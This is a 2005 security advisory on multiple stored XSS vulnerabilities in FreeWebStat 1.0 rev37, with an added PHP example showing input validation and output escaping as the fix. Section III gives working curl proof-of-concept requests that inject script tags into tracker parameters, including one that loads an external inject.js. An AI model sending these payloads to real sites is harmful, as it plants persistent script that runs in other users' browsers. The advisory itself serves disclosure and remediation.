FreeWebStat 1.0 rev37 (the latest version at the time of writing) is vulnerable to multiple XSS. The impact is a little bigger than a plain reflected XSS since the data is stored in a flat file and the result of a single query persists for some time on the backend. A well-timed loop of requests ensures the XSS stays permanent.
This can be used to inject arbitrary JS code into the page and make the JS pseudo-permanent, so other users execute the JS without needing any special URL.
FreeWebStat Multiple XSS Vulnerabilities

Name: Multiple XSS Vulnerabilities in FreeWebStat
Systems Affected: FreeWebStat (verified on 1.0 rev37)
Severity: Medium Risk
Vendor: www.freewebstat.com
Advisory: http://www_ush_it/2005/11/25/free-web-stat/
Author: Francesco "aScii" Ongaro (ascii at katamail . com)
Date: 20051125

I. BACKGROUND

FreeWebStat is a PHP stats program; more information is available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the latest version at the time of writing) is vulnerable to multiple XSS. The impact is a little bigger than a plain reflected XSS since the data is stored to a file and the result of a single query persists for some time on the backend. A well-timed loop of requests ensures the XSS stays permanent.

We issued an advisory for another application by the same author, "Php Web Statistik Multiple Vulnerabilities", who said "new version with all fixed bugs can be found under www.freewebstat.com". Well, we downloaded this version and found the same type of vulnerabilities.

The old advisory: http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

This vulnerability can be exploited by a GET query.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using anti-escape methods (e.g. single quotes are stripped, but there are a lot of working workarounds for this).

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)</script>&jsref=<script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" -e "http://www_ush_it"

$site, $jsref, $jsres and $jscolor are vulnerable. Loading a URL in $jsref will give you a full link (if the logdb.html page has any PR you can drain some of it).

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : ) The order with the example query is 2 3 2 3 4 5.
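The advisory's workaround (section V) is input validation. As an added example that is not part of the advisory or of FreeWebStat's own code, the following PHP shows the two halves of that fix for the fields pixel.php logs and logdb.html displays (section 1), and for the referer/keyword tables stat.php builds from $jsref (section 2): strict validation of the structured parameters when a hit is logged, and HTML escaping of every stored value at output time instead of the strip-and-lowercase handling quoted in 2.2. The function names (fws_validate_hit, fws_render_row, fws_search_terms, h), the column layout, and the assumption that jscolor carries an integer colour depth are mine; the sample hits are constructed.

```php
<?php
// Added example, not FreeWebStat's code: validate structured fields when a hit
// is logged and HTML-escape every stored value when it is rendered. All names
// below are assumptions about how such a tracker could be structured.

// Hostname: letters, digits, dots and hyphens only.
function fws_valid_host(string $host): bool
{
    return (bool) preg_match('/^[a-z0-9.-]{1,253}$/i', $host);
}

// Validate the pixel.php parameters. Returns null when any structured field is
// malformed; the hit is then dropped rather than "cleaned".
function fws_validate_hit(array $get): ?array
{
    $domain  = (string) ($get['domain']  ?? '');
    $jsres   = (string) ($get['jsres']   ?? '');
    $jscolor = (string) ($get['jscolor'] ?? '');
    $jsref   = (string) ($get['jsref']   ?? '');
    $site    = (string) ($get['site']    ?? '');

    if (!fws_valid_host($domain)) {
        return null;
    }
    // Screen resolution such as 1024x768 (assumed format).
    if (!preg_match('/^\d{2,5}x\d{2,5}$/', $jsres)) {
        return null;
    }
    // Colour depth in bits (assumed: the tracker sends screen.colorDepth).
    if (!preg_match('/^\d{1,2}$/', $jscolor)) {
        return null;
    }
    // Referer: empty, or an absolute http(s) URL with a sane host. Its query
    // string is free text and may contain anything; escaping on output handles it.
    if ($jsref !== '') {
        $u = parse_url($jsref);
        if ($u === false || !isset($u['scheme'], $u['host'])
            || !in_array(strtolower($u['scheme']), ['http', 'https'], true)
            || !fws_valid_host($u['host'])) {
            return null;
        }
    }
    // Page title is free text: keep it, cap the length, escape it later.
    $site = mb_substr($site, 0, 200);

    return compact('domain', 'site', 'jsref', 'jsres', 'jscolor');
}

// Output escaping: stored bytes become text, never markup or attribute breakouts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Search terms from a search-engine referer, derived as stat.php does, but escaped.
// Lowercasing and turning + and - into spaces (the 2.2 trick) are kept to show
// they do not neutralise a <script ...> tag; only the final h() does.
function fws_search_terms(string $jsref): string
{
    parse_str((string) (parse_url($jsref, PHP_URL_QUERY) ?? ''), $params);
    $terms = strtolower((string) ($params['q'] ?? ''));
    $terms = str_replace(['+', '-'], ' ', $terms);
    return h($terms);
}

// One logdb.html row. The referer is both link target and link text, so it is
// escaped inside the attribute and inside the text node; rel="nofollow" removes
// the "drain some PR" incentive mentioned in 1.1.
function fws_render_row(array $hit): string
{
    $ref = $hit['jsref'] === ''
        ? ''
        : '<a href="' . h($hit['jsref']) . '" rel="nofollow">' . h($hit['jsref']) . '</a>';
    return '<tr><td>' . h($hit['domain']) . '</td><td>' . h($hit['site']) . '</td><td>'
        . $ref . '</td><td>' . h($hit['jsres']) . '</td><td>' . h($hit['jscolor']) . '</td></tr>';
}

// Constructed sample hits (not real traffic).
$malformed = ['domain' => '<script>alert(1)</script>', 'site' => 'x',
              'jsref' => '', 'jsres' => '1024x768', 'jscolor' => '32'];
var_dump(fws_validate_hit($malformed) === null);   // bool(true): dropped at log time

$hit = fws_validate_hit([
    'domain'  => 'ush.it',
    'site'    => '<script>alert(2)</script>',
    'jsref'   => 'http://www.google.it/search?q=<script>alert(3)</script>&hl=it',
    'jsres'   => '1024x768',
    'jscolor' => '32',
]);
echo fws_render_row($hit), "\n";            // title and referer rendered as &lt;script&gt;..., inert
echo fws_search_terms($hit['jsref']), "\n"; // &lt;script&gt;alert(3)&lt;/script&gt;
```

The split matters: fields with a known shape (domain, jsres, jscolor, the referer's scheme and host) are rejected when they do not match, while genuinely free text (page title, search query) is stored as-is and escaped at every output point. Stripping single quotes or lowercasing, as the original does, leaves the "anti-escape" workarounds from section 1 open; htmlspecialchars with ENT_QUOTES closes both the element and attribute contexts used in logdb.html, and because the fix sits on the storage and rendering path, repeating the request in a loop gains nothing.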
1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=<script>alert(123)&jsref=1024x768&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=<script>alert(1)</script>&site=<script>alert(2)&jsref=</script><script>alert(3)</script>&jsres=<script>alert(4)</script>&jscolor=<script>alert(5)</script>" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" -e "http://www_ush_it"

2) stat.php search key XSS

2.1) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)
# save the referer except the own domain name. if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain ) === FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

Will display as many "DEBUG sukasuka" under the header and over the "summary" as the number of new queries.

# save the referer except the own domain name. if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain ) === FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=ssss&domain="

search words (1)
lello splendor    100 %    1

search engines (1)
Google            100 %    1

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=lello+splendor++&hl=it"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=<script>alert(123456789)</script>++&hl=it"

Now the injection is executed in 2 points, the referer table and the keyword table.

2.2) Exploiting the search key XSS

stat.php gives us some tricks, and we are evil. The string is lowercased and any + or - character becomes a (real, not a %20) space.

$terms = str_replace( '\"', "", $terms ); # delete \"
$terms = strtolower( $terms ); # string to lower
$terms = str_replace( "+" , " ", $terms ); # replace + with space
$terms = str_replace( "-" , " ", $terms ); # replace - with space

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=&jsres=&jscolor=&jsref=http://www.google.it/search?q=ppoopp<script language="javascript"-src="http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it"

IV. DETECTION

FreeWebStat 1.0 rev37 is vulnerable. Older versions not verified.

V. WORKAROUND

Input validation will fix the vulnerability.

VI. VENDOR RESPONSE

Vendor will fix and release a new version.

VII. CVE INFORMATION

No CVE at this time.

VIII. DISCLOSURE TIMELINE

20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response

IX. CREDIT

ascii is credited with the discovery of this vulnerability.

X. LEGAL NOTICES

Copyright (c) 2005 Francesco "aScii" Ongaro

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent. If you wish to reprint the whole or any part of this alert in any medium other than electronically, please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.